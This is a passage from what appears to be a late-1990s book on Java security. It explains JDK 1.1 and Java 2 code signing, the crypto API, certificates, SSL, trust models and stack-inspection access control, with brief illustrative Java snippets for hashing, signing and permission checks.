In 1996, we complained that there was no formal, high-level security model in Java. Instead, the security policy is derived from a collection of low-level detail checking. This is difficult because without a formal model it is impossible to say what secure means. With no standardized model, each vendor is free to define the term secure. In addition, no particular implementation can be verified. A little progress towards a more formal description of the security model was made when Sun commissioned a report entitled Security Reference Model for JDK 1.0.2 [Erdos, et al, 1996]. This sort of work is what users of security-critical consumerware should demand. Unfortunately, the SRM is now seriously out of date. Once again, Internet-time-compressed development schedules have outstripped the need for rigorous security design and analysis. This is a common trend in consumer software, and one that is destined to flame out under the rigorous security demands of e-commerce.

Programming language researchers have also done some work trying to prove the soundness of the Java language and the VM definition [Drossopoulou and Eisenbach, 1998; Stata and Abadi, 1998]. Although this work is still in preliminary stages, some interesting and suggestive results are available. The bottom line is that the definition of Java will probably turn out to be sound, once many more details have been filled in.

The Java runtime system is large (upwards of 28,000 lines of code, not including the VM). This raises important security assurance questions. Generally speaking, programs as large and complex as that are extremely hard to verify. It is common knowledge that buggy software causes many security vulnerabilities [Garfinkel and Spafford, 1996]. There is no centralized authority ensuring that Java's security code is bug free. The Java security system has seen the benefit of external peer review (some solicited and some not). JavaSoft has put together a Security Advisory Board (including one of the authors) and now includes prominent security researchers among its staff. Outsiders have done their best to keep security claims honest, and a number of security researchers (including the authors of this book) are spending a fair amount of effort still trying to find its weaknesses. Later in the book, we discuss some of the problems researchers have found, and what Java vendors are doing to address them. Before we dig into that topic, we introduce the new security mechanisms found in Java 2 and discuss why the Java security model is a completely new beast.
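As a concrete footnote to the Security Manager discussion above, the rule that an applet cannot create its own Class Loader is enforced with a simple check-then-act pattern that recurs throughout the JDK. The wrapper method below is ours, for illustration only; the two library calls are the real ones.

// The pattern the built-in classes use: consult the installed Security
// Manager before a sensitive operation. Untrusted applet code triggers a
// SecurityException here, so the operation never happens.
public static void checkedCreateLoader() {
    SecurityManager sm = System.getSecurityManager();
    if (sm != null) {
        sm.checkCreateClassLoader();   // throws SecurityException if denied
    }
    // ... safe to go ahead and construct the ClassLoader at this point ...
}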
Beyond the Sandbox: Signed Code and Java 2
Section 1 -- What's the Main Goal?
Everyone agrees that code signing makes the Java security model a lot more complicated, not to mention actually using the new system. Where security is concerned, complexity is bad since it increases the odds of an error in the system's design or implementation. If we're going to add all of this complexity, what exactly is it that we are gaining? What's the main goal?

The main goal is to gain better control over the security of mobile code. We can achieve this goal by winning the battle on three fronts. By adding code signing and expanding beyond a black-and-white trust model, we hope to gain:

1. The ability to grant privileges when they're needed.
2. The ability to have code operate with the minimum necessary privileges.
3. The ability to closely manage the system's security configuration.

We can judge the JDK 1.1 and Java 2 security models by how well they meet these objectives.

The first objective is simple: We want to give trusted code the privileges it needs to get its job done. A word-processing applet needs the ability to read and write files, so we want to grant this privilege if we have enough faith that the applet won't misbehave. In general, users want to be able to grant any privileges at all to any code they choose, as long as the benefits of doing so outweigh the risks.

The second objective is to have code that operates with the minimum necessary privileges at all times. Security experts call this the "principle of least privilege." This is a common-sense idea-why use a chain saw when a butter knife is sharp enough for the job-but it has profound implications if we carry it to its logical conclusion. One simple implication is that we want programmers to have a way to renounce their privileges when they aren't needed and reenable the privileges when they are needed. The principle of least privilege can be applied in many places throughout the system:
● We want to grant each applet or application the minimum privileges it needs.
● Rather than assigning a given applet's entire collection of privileges to all of its classes, we want each class to get just what it needs.
● We want a class's privileges to be "turned off" except for brief periods of time.
● We even want to reduce the privileges of some of the built-in system classes.

The third objective is manageability. This is a tricky one. Some might think that the ultimate in management power is when all possible options are presented to the user. (Power users, developers, and other gurus tend to think along these lines.) But in reality, users are overwhelmed and irritated when they are confronted with too many big complicated dialog boxes. Somehow the choices must be boiled down so that users get just the control they need without being asked any unnecessary questions.

As we see in the rest of this chapter, the Java security model is still a work in progress. Nobody knows yet how to achieve all of these goals, or even how they trade off against each other. Today's models are pretty good, but they are a far cry from perfect.
Section 2 -- Security Enhancements in JDK 1.1
JDK 1.1 appeared in the early Spring of 1997 and included a number of improvements and changes to the base Java security model of JDK 1.0.2. Fortunately, none of the material about the base Java security model covered in the last chapter (or for that matter, things you learned from the previous edition of this book) was outdated or replaced; rather, the Java security architecture was changed through a process of enhancement and addition. From a security perspective, the most important changes introduced in JDK 1.1 were the addition of authentication and simple access-control mechanisms that rely on the use of cryptography. Remember, security is much more than just cryptography. Think of cryptography as a means to an end-an important part of the puzzle, but only a part. A side effect of the need for cryptographic functionality inside the model itself was the creation of a crypto API. The crypto API, also introduced with JDK 1.1, provides a basic toolkit of cryptography algorithms that developers can use in their programs.
The Crypto API

Today, Java includes a cryptography toolkit that includes both an API and some packages implementing a portion of the functionality behind the API. Classes in the java.security package, the package implementing the cryptographic functionality, have a dual purpose. One purpose is to provide the cryptographic methods that Java's designers used to implement the JDK 1.1 and Java 2 security models. The second purpose is to provide cryptography functionality to Java developers charged with creating secure applications.

Parts of a crypto API were released with JDK 1.1. The parts included both one-way hash functions and
digital signature capability. DES encryption tools were released only as an extension to North American users. Encryption tools and their mathematically related cousins (such as digital signing) change the way Java use policies are managed.

Digital signatures, which are discussed next, make it possible to authenticate who has vouched for a piece of code, and potentially check it for tampering. If you decide to trust a particular person, you can set things up so that you automatically trust programs that person signs. (Note that with the right tools, anyone can sign any piece of code. Whether or not a piece of code is written, released, or supported by the person who signed it is not something digital signatures can tell you.) Because the signature is a mechanism for vouching and spreading trust around, if you trust some experts in the field who agree to approve Java programs based on their analysis, you can trust any code that they sign as well. Digital signing paves the way for a true community of trust to develop. We think digital signing is important enough to warrant an entire section itself. See page 88.

Beyond digital signatures, the crypto API released with JDK 1.1 includes a couple of other capabilities. One-way hash functions provide a way to fingerprint a program or data so that you can verify that it has not been changed since being created. Fingerprinting hash functions such as MD5 and SHA make distribution over the Net easier to swallow. If you are certain that a program you are downloading from the Net is the original program (and not a Trojan Horse masquerading as the original), you will probably be more likely to use it. Many archives on the Web today make use of MD5.

Fingerprinting, also called message digesting, works by performing a one-way hash over a series of bytes. Given a program (which is really just a bunch of ones and zeros), it is possible to compute a hash that ends up being many times smaller than the original program, but (hopefully) represents only that program. The main trick is to avoid collisions, whereby the same fingerprint is computed for different programs, and to come up with a hash function that can't be run in the opposite direction. MD5 and SHA are systems for computing one-way hashes over a binary file. The crypto API provides a way for Java programs to include this functionality.

MD5 and SHA are useful when it comes to signing code because the act of signing is actually a complicated function of a secret crypto key and the data to be signed. The math is hairy enough that it is a much better idea to compute it using a program's hash instead of the program itself. Remember, the hash is many times smaller than the program it represents. Figure 3.1 shows the important role that one-way hash functions play in code signing.
Figure 3.1 How code is digitally signed (A) and digital signatures are verified (B). (A) Signing code takes several distinct operations: (1) a one-way hash calculation is run on a piece of binary code, resulting in a small "thumbprint" of the code; (2) the hash is signed using the signer's private key; (3) the signed hash and the original binary code are placed together (potentially along with other signed and unsigned code) in an archive JAR. Now the JAR can be shipped around as mobile code. (B) Validating signed code also takes several steps: (1) a piece of binary code and its associated signed hash are removed from the JAR; (2) a new hash is calculated using the same one-way hash algorithm that the signer used to create the signed hash; (3) the signature carried by the signed hash is cryptographically validated with the signer's public key (possibly with reference to certificate authorities and trust chains); (4) if the signature checks out, the now decrypted original hash is available for comparison with the new hash. Though all three Java code signing schemes (Sun, Microsoft, and Netscape) share these two processes, there are enough differences that the systems do not inter-operate. See Appendix C for examples of how to sign Java code under each implementation.
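The flow in Figure 3.1 maps directly onto the JDK 1.1 crypto API. The sketch below is illustrative rather than production code (the choice of DSA and the toy byte array are assumptions of ours): it hashes a chunk of data, signs it with a freshly generated private key, and verifies the signature with the matching public key.

import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.MessageDigest;
import java.security.Signature;

public class SignSketch {
    public static void main(String[] args) throws Exception {
        byte[] code = "pretend this is byte code".getBytes();

        // (1) One-way hash ("thumbprint") of the data.
        MessageDigest sha = MessageDigest.getInstance("SHA");
        byte[] thumbprint = sha.digest(code);
        System.out.println("digest is " + thumbprint.length + " bytes long");

        // (2) Sign with a private key. The Signature engine hashes
        //     internally, which is why signing scales to large inputs.
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
        kpg.initialize(1024);
        KeyPair pair = kpg.generateKeyPair();

        Signature signer = Signature.getInstance("SHA1withDSA");
        signer.initSign(pair.getPrivate());
        signer.update(code);
        byte[] sig = signer.sign();

        // (3) Anyone holding the public key can verify the signature.
        Signature verifier = Signature.getInstance("SHA1withDSA");
        verifier.initVerify(pair.getPublic());
        verifier.update(code);
        System.out.println("signature valid? " + verifier.verify(sig));
    }
}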
Another function that appeared as part of the crypto API (at least in the package available only in the United States, and known as the Java Cryptography Extension, or JCE) was DES encryption. DES, an acronym for Data Encryption Standard, is a venerable old encryption algorithm that can in some cases be deciphered (given enough effort and a small enough key). DES is certainly much more secure than plain text, but does not provide the best available security. In 1998, the EFF created a special-purpose machine to crack DES messages. The purpose of the machine was to emphasize just how vulnerable DES really is. (For more on the DES cracker, see www.eff.org/descracker/.)

Most Unix machines use a variant of DES to encrypt user passwords stored in the /etc/passwd file. If 56-bit (or smaller) keys are used for DES, then the U.S. government will allow its export and use outside the United States. There is also a variant called triple DES that effectively has a 112-bit key, which will be safe against brute-force searching for a long time. The ease of "breaking" DES is directly related to the length of its key.
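For completeness, here is roughly what using the JCE's DES support looks like. The class names below are those of the JCE as it was later standardized (javax.crypto); the original export-restricted release may have been packaged differently, so treat this as an illustrative sketch rather than a description of the 1.1-era extension. DES appears only because it is the algorithm the text discusses; as noted above, it is vulnerable to brute-force key search.

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;

public class DesSketch {
    public static void main(String[] args) throws Exception {
        // Generate a random 56-bit DES key.
        SecretKey key = KeyGenerator.getInstance("DES").generateKey();

        Cipher cipher = Cipher.getInstance("DES");
        cipher.init(Cipher.ENCRYPT_MODE, key);
        byte[] ciphertext = cipher.doFinal("a secret message".getBytes());

        cipher.init(Cipher.DECRYPT_MODE, key);
        byte[] plaintext = cipher.doFinal(ciphertext);
        System.out.println(new String(plaintext));
    }
}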
Certificates

Another feature that appeared in JDK 1.1 is certificate technology based on the X.509v3 open standard. Certificates provide an authentication mechanism by which one site can securely recognize another. Sites that recognize each other have an opportunity to trust each other as well. When a secure socket layer (SSL) connection initializes between two machines, they handshake by exchanging certificates. SSL is discussed in the next section.

A certificate is a piece of identification (credential) much like a driver's license. Information stored inside a typical certificate file includes the subject's name, the subject's public key, the certificate's issuer, the issuer's digital signature, an expiration date, and a serial number. So the question is, who gives out these certificates? Someone (or some thing) called a certification authority (CA). There are a handful of companies that have set themselves up as CAs in the world. These include Netscape, GTE, Verisign, and a few others. But why should you trust them? Good question. (See page 92.)
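Reading the fields of a certificate programmatically is straightforward with the certificate classes that ship in Java 2 (java.security.cert). The sketch below, which assumes an encoded certificate sitting in a local file we have called server.cer, prints the sort of credential data just described.

import java.io.FileInputStream;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;

public class CertSketch {
    public static void main(String[] args) throws Exception {
        FileInputStream in = new FileInputStream("server.cer");
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        X509Certificate cert = (X509Certificate) cf.generateCertificate(in);
        in.close();

        System.out.println("Subject: " + cert.getSubjectDN());
        System.out.println("Issuer:  " + cert.getIssuerDN());
        System.out.println("Serial:  " + cert.getSerialNumber());
        System.out.println("Expires: " + cert.getNotAfter());
        cert.checkValidity();   // throws an exception if the certificate has expired
    }
}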
Secure Communication

Java 2 now includes a package for secure socket layer (SSL) communication. Similar to Netscape's SSL, the Java SSL provides a secure communications channel by using encryption. SSL works by providing a mechanism for encrypting packets on the sending end, sending them over an untrusted channel, and decrypting them at the receiving end. SSL is useful for many business applications, including the transmission of proprietary information and electronic currency.

Most Web servers and browsers now support SSL, allowing a browser to communicate with a Web server
without anyone else overhearing the conversation. (Well, an outsider might overhear a conversation, but he or she certainly won't understand it.) Though SSL is commonly used over the Web, it can actually be used to protect virtually any sort of network transaction. Most browsers support SSL by providing a "Secure HTTP Connection" service that looks to the user just like a normal Web connection, but uses SSL underneath. This allows you to reap the benefits of SSL without having to learn anything except how the browser tells you whether a connection is secure. The encryption technology underlying SSL is generally believed to be secure, but there are two potential problems. First, the U.S. government restricts the export of strong cryptography software. If your browser version includes dumbed-down exportable cryptography software, your communications might not be as secure as you think. Second, SSL is good at providing secure communications, but it is not as good at establishing who you are communicating with. This leads into all the problems of authentication and key distribution discussed on page 90.
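For programmers, the basic idea looks roughly like the sketch below, which uses the javax.net.ssl classes from Sun's JSSE package. The host name and request are illustrative only; the handshake and encryption happen under the covers when the socket is created.

import java.io.PrintWriter;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

public class SslSketch {
    public static void main(String[] args) throws Exception {
        // Open an SSL-protected connection; the certificate exchange
        // described above happens during the handshake.
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        SSLSocket socket = (SSLSocket) factory.createSocket("www.example.com", 443);

        PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
        out.println("GET / HTTP/1.0");
        out.println();
        // ... read the response from socket.getInputStream(); it is encrypted
        // in transit, so an eavesdropper sees only gibberish ...
        socket.close();
    }
}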
Section 3 -- Signed Code
The capability to digitally sign Java byte code (at least byte code files placed in a Java archive, called a JAR file) was introduced with JDK 1.1 and greatly expanded with Java 2. Digital signing capability is an important part of the new Java security regimen. This is exciting because digital signing radically alters the amount of trust you can place in a piece of code. A tutorial on signing Java code with the current tools from Microsoft, Netscape, and Sun can be found in Appendix C.

One particular kind of cryptography tool allows a chunk of digital information (including, of course, Java byte code) to be signed by a person or organization. See Figure 3.1. Because a digital signature has special mathematical properties, it is difficult to forge. Your browser can verify a signature, allowing you to be fairly certain that a particular person or organization vouches for the code. That means you can instruct your browser always to accept applets signed by some party that you trust, or always to reject applets signed by some party that you don't trust. The same goes for a non-browser-based VM, which can be instructed (through policy) how to treat application code signed by particular entities.

It is important to recognize that even if you know exactly which Web pages you are visiting and who created them, you probably don't know who wrote each applet that appears on the pages you visit. Applets are shuffled around on the Net like Beanie Babies in a fifth-grade classroom. Contrary to popular belief, you don't always know where information is coming from on the Internet. A nasty attack called IP spoofing allows a bad guy to send you network traffic that claims to come from someplace else. For instance, you might think the traffic is coming from "whitehouse.gov", when it's really coming from "cracker.org". IP spoofing used to be considered just a theoretical possibility, but it has actually happened in recent years. The best-known example is an attack by the infamous cracker Kevin Mitnick on a machine managed by computer security worker Tsutomu Shimomura. Mitnick's attack led to his eventual capture and conviction [Shimomura and Markoff, 1996].

An attack known as Web spoofing shows that even in the absence of IP spoofing, it is not always clear that you are visiting the site you think you're visiting [Felten, et al., 1997]. An attacker can lure you into a "false Web" that looks just like the real one, except that the attacker can see everything you do, including anything you type into a form, and the attacker can modify the traffic between you and any Web server. All of this is possible even if your browser tells you that you have a "secure" connection. See Figure 3.2.
Figure 3.2 A Web spoofing attack can be carried out with extensive use of a browser's mobile code capability. The Princeton team has implemented a demonstration of Web spoofing that makes extensive use of JavaScript. Once an attacker has lured the victim to the attack server (shown as www.attacker.org), the attacker can control the victim's view of the Web by acting as a rewriting proxy. Clever use of JavaScript makes all changes invisible to the victim and can even appear to offer encrypted traffic.
Even if you ignore the possibility of spoofing, using the return address of an applet (that is, knowing the Web site where you got the applet code) still isn't good enough to base a trust decision on. A digital signature holds much more information. For example, such a signature could tell you that although the applet is being redistributed by a site you don't trust, it was originally signed by someone you do trust. Or it can tell you that although the applet was written and distributed by someone you don't know, your friend has signed the applet, attesting that it is safe. Or perhaps it can simply tell you which of the thousands of users at aol.com signed the applet.
Digital Signatures

So how do you sign a piece of code? The key to certification and authentication is the use of digital signatures. The idea is simple: to provide a way for people to sign electronic documents so that these signatures can be used in the same way we use signatures on paper documents. In order to be useful, a digital signature should satisfy five properties [Schneier, 1995]. It should be:

1. Verifiable: Anyone should be able to validate a signature.
2. Unforgeable: It should be impossible for anyone but you to attach your signature to a document.
3. Nonreusable: It should be impossible to "lift" a signature off one document and attach it to another.
4. Unalterable: It should be impossible for anyone to change the document after it has been signed, without making the signature invalid.
5. Nondeniable: It should be impossible for the signer to disavow the signature once it is created.

Mathematicians and computer scientists have devised several digital signature schemes that appear to work quite well. The full details are very technical. If you're interested in learning more about such schemes, Bruce Schneier's excellent book, Applied Cryptography, is a good place to start [Schneier, 1995].

The digital signatures used for Java code are based on public-key cryptography. If Alice wants to be able to sign documents, she must first use a special mathematical technique to generate two large numbers: her own private key, and her public key. As the names suggest, Alice keeps her private key to herself. Keeping it secret is essential. Her public key, however, is announced to the world.

Alice's private key is used for signing electronic documents. Her public key is used to verify those signatures. See Figure 3.1. Anyone who knows the private key (hopefully only Alice!) can run a special computation involving the document and Alice's private key. The result of this process is a digitally signed version of the document. Anyone who knows Alice's public key can verify her signature by running a special computation involving the signed document and Alice's public key. Since only Alice knows the private key, she is the only one who can put her signature on documents. Since everyone knows her public key, anyone can verify that the signature is hers.

Everything sounds great. You tell your browser to trust applets signed by Alice by registering Alice's public key. Whenever applets claim to come from Alice, the browser can verify that claim by comparing the registered public key to the signed applet. If the applet is not from Alice, it can be rejected.
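The key-pair generation and signing machinery Alice needs has been part of the core java.security API since JDK 1.1. The sketch below, with an invented class name and document text, generates a DSA key pair, signs a document with the private key, and verifies the signature with the public key.

import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;

public class SignatureSketch {
    public static void main(String[] args) throws Exception {
        // Alice generates her public/private key pair once.
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
        kpg.initialize(1024);
        KeyPair alice = kpg.generateKeyPair();

        byte[] document = "I vouch for this applet".getBytes();

        // Signing uses the private key...
        Signature signer = Signature.getInstance("SHA1withDSA");
        signer.initSign(alice.getPrivate());
        signer.update(document);
        byte[] sig = signer.sign();

        // ...verification uses the public key.
        Signature verifier = Signature.getInstance("SHA1withDSA");
        verifier.initVerify(alice.getPublic());
        verifier.update(document);
        System.out.println("Signature valid? " + verifier.verify(sig));
    }
}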
Key Distribution

But how do you know what Alice's public key is? If you know Alice, she can call you on the phone and tell you her public key. In this case, you will know the key is valid because you recognize Alice's voice. This doesn't work if you don't know Alice. How do you know the person on the other end of the phone is Alice? Maybe it's Alice's evil twin Zelda, trying to pass off Zelda's public key as Alice's so she can forge Alice's signature.

One way around this problem is to ask Alice's twin brother Allan to help. Alice can create a document containing her public key and have Allan sign that document. If you trust Allan and you know Allan's public key, then the document tells you reliably what Alice's public key is. But how do you know Allan's public key? You can't ask Alice and Allan to vouch for each other's public keys, because Zelda could create a false Alice key and a false Allan key and use them to sign documents vouching for each other! This leaves us stuck with a chicken-and-egg problem.

The usual solution is to use a certification authority (CA). The CA, Claire in our example, is in the business of certifying keys. Alice goes to the CA's office with her birth certificate, passport, driver's license, and DNA sample. Once she has convinced Claire that she really is Alice, she tells Claire her public key, and Claire signs an electronic document that contains Alice's public key. That document serves as an electronic credential for Alice.

After Alice has a credential, key distribution is much easier. Alice can plaster copies of her credential everywhere: on bulletin boards, on her homepage, and at the end of every email message she sends. Better yet, whenever Alice signs a document, she can attach a copy of her credential to the signed document. On receiving the document, you can first check the credential by verifying Claire's signature, and then verify Alice's signature using the public key included with the document. Zelda can't trick you into accepting a bogus public key for Alice, because she can't forge Claire's signature. Figure 3.3 shows the process by which a signature on a piece of signed code can be validated.
Figure 3.3 Validating a signature on signed code. In this example, a piece of code is signed by the private key of thing1. The corresponding public key, available on thing1's certificate, can be used to validate the signature carried by the code. For added security and to make key management more reasonable, browsers typically validate the CA signature carried on the certificate.
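In code, the validation shown in Figure 3.3 boils down to two checks, sketched below with invented method and variable names: first verify the CA's (Claire's) signature on the credential, then use the public key inside the credential (Alice's) to verify the signature carried by the code.

import java.security.PublicKey;
import java.security.Signature;
import java.security.cert.X509Certificate;

public class ValidateSketch {
    // Returns true if caKey vouches for the credential and the credential's
    // subject vouches for the code. All arguments are illustrative.
    static boolean validate(X509Certificate credential, PublicKey caKey,
                            byte[] code, byte[] codeSignature) throws Exception {
        // Step 1: check the CA's signature on the credential.
        credential.verify(caKey);   // throws an exception if the check fails

        // Step 2: use the public key from the credential to check the
        // signature carried by the code.
        Signature sig = Signature.getInstance("SHA1withDSA");
        sig.initVerify(credential.getPublicKey());
        sig.update(code);
        return sig.verify(codeSignature);
    }
}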
The beauty of this approach is that if everyone can visit Claire and get a credential, then no one has to remember any keys except for his or her own private key (to sign documents), and Claire's public key (to verify credentials). There are still two problems, though. Everyone must trust Claire. As the authority, she can impersonate anyone. And you still need a reliable way to get Claire's public key. It doesn't help to have Claire get a credential from Claire's mom, Elena. You would have no more reliable way of knowing who Elena is.
There is no technological solution to this. Claire's key will probably be hard-wired into your browser software, or entered by support staff at install time. As long as you get a valid copy of the browser, and no one has messed with your hard disk, everything will be okay. How do you know you have a valid copy of the browser? It will be signed by the browser vendor. How do you know the browser vendor's signature is valid? Don't ask; there lies madness.
What Signing Can't Do

Even if the signing and signature-checking mechanisms work perfectly and are able to reveal who signed each applet, a huge unsolved problem still remains. Technology can tell you who signed an applet, but it can't tell you whether that person is trustworthy. That's a decision you have to make based on human judgment. And you'd better make the right decision.
Section 4 -- Trust
Once a code signing infrastructure is in place, you will be able to know reliably who vouches for each Java program. The next link in the chain is figuring out what to do with that knowledge. One thing you can certainly do is relax Java's security rules for applets that you trust. For example, with the default sandbox, Java normally prohibits any access to files in order to prevent an applet from corrupting your hard drive or reading your private data. If you trust applets from particular sources, though, you might want to allow them to read files. Introducing permissions granted according to trust level opens up vast new application areas, including things like spreadsheet applets, games with stored high scores, Web sites that recall your preferences, a host of different remote management possibilities, and so on.

Besides access to files, there are many other capabilities you might want to grant a trusted applet or application: access to your machine's microphone and camera, freedom to make network connections, and maybe even freedom to label other code as trusted. It all depends on whether you decide to trust a signed program, and how much. There are several ways you can make these decisions.
Who Do You Trust?

The first decision is whether to use a black-and-white or a shades-of-gray policy. A black-and-white policy is one that divides all programs into two groups: trusted and untrusted. This was the only sort of trust policy that was easy to implement using JDK 1.1. Java 2, however, changed all that. Java 2 makes it possible to create a shades-of-gray policy, allowing you to assign any degree of partial trust to a Java program. (Recall Figure 1.6 in Chapter 1.)
Before Java came along, most Internet software worked on a black-and-white model. If someone offered to let you download a program, you had two choices: either you downloaded the program or you didn't. If you did, you were trusting the program completely, since there was nothing to stop it from running wild on your machine. If you didn't download the program, you were treating it as completely untrusted. Java, with its security policies as implemented in the base sandbox, changed the rules a bit by making it easier to decide what to download in the first place. If an untrusted applet can't bite you, you might as well check it out.

The black-and-white model is sometimes called the shrink-wrap model because it's similar to software you purchase. If you buy a software package from a reputable software store, you can reasonably assume that the software is safe to load onto your machine. People who use the term shrink-wrap model tend to assume that no one would ever want to run software that wasn't written by a large software company. We don't agree with that implication, so we'll stick with the term black-and-white.

It might seem that the shades-of-gray model is clearly better than the black-and-white model: black-and-white only allows you to label programs as completely trusted or completely untrusted, while shades-of-gray gives you more choices. (You may still label an applet as completely trusted or completely untrusted if you wish.) But choices are not always good, as anyone who has encountered the cereal aisle of a large supermarket can attest. Making choices takes up time that you would probably rather spend doing something else. Frequent decision-making saps your attention span, so you are more likely to make a mistake, thus opening yourself up to attack. Finally, having more options saddles your browser with more complicated record-keeping duties to keep track of all of your decisions. This extra complexity might lead to bugs in the browser, possibly jeopardizing security yet again.

Which model is better, black-and-white or shades-of-gray? It depends on how people react to the two systems, which is hard to predict. Most likely, competing browsers will offer different models, and the models will fight it out in the marketplace. The decision is ultimately one of user preference.
Free the Trusted Code!

Once you've decided who to trust, the next issue is what you allow trusted programs to do. If you're using the black-and-white model, then you have to decide whether to allow untrusted programs, like applets off unknown Web sites, to run at all. You also have to decide what extra capabilities, if any, you want to give to trusted programs. You might decide to let trusted programs do whatever they want, with no restrictions at all. Or you might decide to run trusted programs under the restrictive Java security rules of JDK 1.0.2. The choices depend on your taste for risk and what kinds of programs you want to run. With black-and-white security, however, all the programs you trust receive the same level of trust.

If you're using a shades-of-gray model, you face more choices. You may decide on a program-by-program (or signer-by-signer) basis exactly which capabilities to grant. Rather than presenting you with a huge laundry list of possible capabilities for each program and forcing you to tick items off the list, a good browser will probably provide a way for you to grant certain prepackaged sets of capabilities. For example, there might be a set of permissions for videoconferencing applets, which would include things like permission to use the camera, the microphone, the speaker, the display, and networking access. Perhaps there would be another set of document-editing applet permissions, which would include file-creation, file-reading, and file-modification capabilities.

There are two basic ways to group the mapping of programs to permissions. Microsoft's Authenticode system, introduced in Chapter 1, defines security zones, which are ways of grouping programs together. For example, all programs from a company intranet signed by the system administrator's key might comprise a zone. (These zones might well involve multiple keys and origins.) Policies can then be defined on a per-zone basis. Netscape defines macro targets, which are groups of permissions (as sketched in the previous paragraph). For example, a macro target might be called "typical game privileges" and define the permissions typically needed by a network-enabled game. Sun has a system of implication in which permission for code to use one resource can imply permission to use another resource. In their model, each resource is required to define an implies() method that can be used to ask a resource whether it implies a particular other permission. (More detail is provided later in this chapter.) All of these are examples of grouping signers or privileges together and treating the group as a unit. Grouping is generally a good idea in security management because it reduces the number of decisions that the user (or other policy-maker) faces. Fewer decisions means more attention paid to each decision and, hence, better decisions.

JDK 1.1, which introduced the concept of a signed applet, provides a black-and-white model. A digitally signed applet can be treated as trusted local code as long as the signature key is recognized as trusted by the system finally running the code. Java 2 provides a shades-of-gray model.
Section 5 -- An Introduction to Java 2 Security
Signatures alone don't provide the infrastructure needed to allow Java code out of the sandbox gradually. Access control mechanisms are required as well. In JDK 1.1, for example, applet code signed by a trusted party can be treated as trusted local code, but not as partially trusted code (without an inordinate amount of extra programming). There is no notion of access control beyond the one-and-only trust decision made per class. That means in practice, JDK 1.1 offers a black-and-white trust model much like ActiveX (although with the clear advantage that untrusted code must stay in the sandbox).

The new security architecture in Java 2 has four central capabilities [Gong and Schemers, 1998]:

Fine-grained access control: The ability to specify that code with proper permissions is allowed to step outside the sandbox constraints gradually (for example, an applet signed by a trusted key might be allowed to open arbitrary network connections).

Configurable security policy: The ability for application builders and Java users to configure and manage complex security policies.

Extensible access control structure: The ability to allow typed permissions and to group such permissions in logical, policy-oriented constructs.

Security checks for all Java programs: A departure from the concept that built-in code should be completely trusted. (It is this capability that serves to erase the once-important distinction between applets and applications.)

It is important to note that the first three of these four capabilities are not really new to Java. Java is a powerful programming language, and it has always been possible to implement complex, configurable, extensible security policies based on fine-grained access control. It was just exceptionally tricky. Java 2 serves to make this task possible for mere mortals.
A View from 50,000 Feet

At its heart, the Java 2 security model has a simple idea: Make all code run under a security policy that grants different amounts of privilege to different programs. While the idea may be simple, in practice, creating a coherent policy is quite difficult. Figure 3.4 shows the role that mobile code identity and policy play in Java 2.
Figure 3.4 Mobile code in Java 2 interacts with user-defined policy through the AccessController. Byte code may make calls to potentially dangerous functionality. When such calls are made, the AccessController (new to Java 2) consults policy and uses stack inspection to decide whether to allow or disallow a call. Decisions are based on the identity of the code.
Java 2 code running on the new Java VMs can be granted special permissions and have its access checked against policy as it runs. The cornerstone of the system is policy (something that will not surprise security practitioners in the least). Policy can be set by the user (usually a bad idea) or by the system administrator, and is represented in the class java.security.Policy. Herein lies the Achilles' heel of Java 2 security: setting up a coherent policy at a fine-grained level takes experience and security expertise. Today's harried system administrators are not likely to enjoy this added responsibility. On the other hand, if policy management is left up to users, mistakes are bound to be made. Users have a tendency to prefer "cool" to "secure." (Recall the dancing pigs of Chapter 1.)

Executable code is categorized based on its URL of origin and the private keys used to sign the code. The security policy maps a set of access permissions to code characterized by particular origin/signature information. Protection domains can be created on demand and are tied to code with particular CodeBase and SignedBy properties. If this paragraph confuses you, imagine trying to create and manage a coherent mobile code security policy!
Code can be signed with multiple keys and can potentially match multiple policy entries. In this case, permissions are granted in an additive fashion.
A Simple Example

A simple example of how this works in practice is helpful. First, imagine a policy representing the statement "applet code from www.rstcorp.com/ signed by 'self' is given permission to read and write files in the directory /applet/tmp and connect to any host in the rstcorp.com domain." Next, a class signed by "self" that originates from www.rstcorp.com/ arrives. As the code runs, access control decisions are made based on the permissions defined in the policy. The permissions are stored in permission objects tracked by the Java runtime system. Technically, access control decisions are made with reference to the runtime call stack associated with a thread of computation (more on this later).
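Under the hood, library code guards a resource by asking the AccessController whether the calling code (as characterized by policy and the call stack) holds the needed permission. A minimal sketch, with an invented class name, using the file from the hypothetical policy above:

import java.io.FilePermission;
import java.security.AccessControlException;
import java.security.AccessController;

public class CheckSketch {
    static void openScratchFile() {
        try {
            AccessController.checkPermission(
                new FilePermission("/applet/tmp/scratch", "read"));
            // Permission granted by policy: go ahead and read the file.
        } catch (AccessControlException e) {
            // Some code on the call stack lacks the permission: refuse access.
            System.err.println("read access denied: " + e.getMessage());
        }
    }
}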
Section 6 -- Access Control and Stack Inspection
The idea of access control is not a new one in computer security. For decades, researchers have built on the fundamental concept of grouping and permissions. The idea is to define a logical system in which entities known as principals (often corresponding one to one with code owned by users or groups of users) are authorized to access a number of particular protected objects (often system resources such as files). To make this less esoteric, consider that the familiar JDK 1.0.2 Java sandbox is a primitive kind of access control. In the default case, applets (which serve as principals in our example) are allowed to access all objects inside the sandbox, but none outside the sandbox. So what we're talking about here is a way of setting up logical groupings. Then we can start talking about separating groups from each other and granting groups particular permissions. Security is all about separation. Readers familiar with the Unix or NT file system will see clear similarities to the notion of user IDs and file permissions.

Sometimes a Java application (like, say, a Web browser) needs to run untrusted code within itself. In this case, Java system libraries need some way of distinguishing between calls originating in untrusted code and calls originating from the trusted application itself. Clearly, the calls originating in untrusted code need to be restricted to prevent hostile activities. By contrast, calls originating in the application itself should be allowed to proceed (as long as they follow any security rules that the operating system mandates). The question is, how can we implement a system that does this?

